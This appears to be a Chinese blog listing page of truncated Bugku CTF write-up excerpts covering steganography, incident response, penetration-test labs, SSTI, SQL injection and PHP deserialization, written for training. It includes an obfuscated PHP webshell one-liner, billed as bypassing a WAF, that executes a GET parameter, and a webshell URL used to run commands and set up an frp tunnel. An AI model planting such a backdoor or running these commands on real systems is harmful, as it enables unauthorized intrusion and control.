bugku
Misc_Bugku_WriteUp | 隐写
题目 (png 图片 分析 如标题,目标是查找图片里的 flag。 打开属性,没有有关信息。 用 010 Editor 打开文件,文件头为 PNG 文件头,不存在文件类型被更改。 用 StegSolve 查看不同颜色通道,没有找到 flag。 开始摸不着头脑的时候,想起来之前做过一题通过改变图片大小 ......
Misc_Bugku_WriteUp | 这是一张单纯的图片
题目 (一张 jpg 格式的图片 分析 查看属性,没有信息。 用 010 Editor 打开,确认文件头为 jpg 文件头。 查看内容,在文件末尾发现一串有规律的字符 key{you are&# ......
bugku----应急加固1 WP
bugku 应急加固1 WP 1.获取js劫持域名(带https) https://www.194nb.com 2.黑客首次webshell 密码 导出/var/log/nginx中的日志 全局搜索POST 3.黑客首次攻击(非有效攻击)通过什么方式(如:文件上传、SQL注入、命令执行) 搜索恶意i ......
bugku----应急加固【简单】 WP
bugku 应急加固【简单】 WP 开始应急响应 1.先将网站源码复制出来 2.看第一题 询问提权方式 查看apache日志,发现sql注入的痕迹 发现网站源码中存在phpmyadmin,进而发现是udf提权 查看数据库密码 3.第二题 删除webshell 继续查看日志 这个地方可疑 果然是web ......
bugku渗透测试3 WP
bugku渗透测试3 WP flag1,2,3 爆破网段 发现1,2,10,138,250的时候有变化 猜测木马文件名为shell.php 远程下载frpc http://192.168.0.10/shell.php?cmd=chmod 777 frpc http://192.168.0.10/sh ......
bugku渗透测试2 WP
bugku渗透测试2 WP 先fscan一段扫,无果 然后nmap扫全端口,无果 之后回到web端查看指纹,发现希望 发现这个有nday漏洞 <?php class Typecho_Feed { const RSS1 = 'RSS 1.0'; const RSS2 = 'RSS 2.0'; cons ......
bugku渗透测试1 WP
渗透测试1 wp 利用fscan对主站进行扫描 flag1 flag2 在url中输入http://xxx/admin会跳转到登录页面,弱口令admin admin 提示/home flag3 在上传后缀这里添加php,点击立即提交 回到前台,点击php教程,点击运行预览 然后输入一句话木马,f12 ......
Bugku simple_SSTI_1
ssti注入 又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行 ......
Bugku-Web23
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085627725-1803621512.png) 这个题目告诉我,正则表达式还要好好的学一下;; ![images](https://img2023. ......
Bugku-Web29
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085729143-2084999254.png) sha数组绕过问题,和md5类似方法:: ``` <?php highlight_file('fla ......
Bugku-Web31
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085740155-964345158.png) 后台扫描发现有robots.txt ![images](https://img2023.cnblogs ......
Bugku-web37
不能放过任何提示或是编码: ![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085841029-443888435.png) 参考博客:: [https://blog.csdn.net/qq_4120 ......
Bugku-web40
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085916851-2119791233.png) 这题考察的是git信息泄露,挺好的题目;;我都不懂git信息泄露是什么鬼 用dirsearch扫描后 ......
Bugku-web41
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085929091-1286459289.png) 该题目涉及到了序列化;Base64解码;cgi;ssrf;php中的file协议; 代码审计,我只知 ......
Bugku-web34(文件包含)
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085804217-893683872.png) 一: 学到了一个挺有意思的文件包含代码:: ``` ``` ![images](https://img ......
Bugku-web35(序列化)
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085816055-1593173101.png) 访问css样式之后得到提示: ![images](https://img2023.cnblogs.c ......
Bugku-web36(sql注入)
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085829939-2078684871.png) 这个题目对于我来说还是很有难度的;;;毕竟我菜;;;唉;;; 打开页面是个登录界面:: ![imag ......
Bugku-xxx二手交易市场
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085951951-557256578.png) ![images](https://img2023.cnblogs.com/blog/1845942/ ......
Bugku-web39(CBC反转攻击)
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085906487-1323608896.png) 传入cipher:: o0Na0VUpA9NNqK5lQTP3chZqec57H%2FAMEkq5Y ......
Bugku-web安慰奖(序列化)
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085941020-1792810579.png) php序列化的一个题目;; 参考博客:[https://blog.csdn.net/weixin_4 ......
Bugku-Web18
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829164532573-1017021044.png) ![images](https://img2023.cnblogs.com/blog/1845942 ......
Bugku-Web19
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085552385-1903764495.png) ![images](https://img2023.cnblogs.com/blog/1845942 ......
Bugku-Web22
送给大家一个过狗一句话 `$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])` ![i ......
Bugku-Web24
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085642245-1549816103.png) 5 ![images](https://img2023.cnblogs.com/blog/18459 ......
Bugku-Web25
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085653609-1421900041.png) 第一次还是了解到这个sql约束工具,有点趣味吧... ![images](https://img20 ......
Bugku-Web26
眼睛瓢太快,看到了评论区的评论,这题不难! ![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085705540-404238906.png) 考点主要是在Referer 在burp中增加Referer ......
Bugku-Web27
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230830085717435-1665980578.png) md5 collision(md5 碰撞) 一般意思,用数据绕过就可以了;;这是我目前所学到的! ! ......
Bugku-聪明的php
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829163910538-882284009.png) smarty模板注入常用的payload 常用payload ``` 常用payload {if ph ......
Bugku-game1
看了大佬的wp做出来的; ![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829163958154-1811395059.png) 首先是个游戏,对这个没有什么想法,看了大佬的博客,说是会有个sign,然后 ......
Bugku-Web12
![images](https://img2023.cnblogs.com/blog/1845942/202308/1845942-20230829164401466-1203733578.png) 没啥思路,感觉自己在刷题,,, 这个考虑的是本地管理员 ![images](https://img2 ......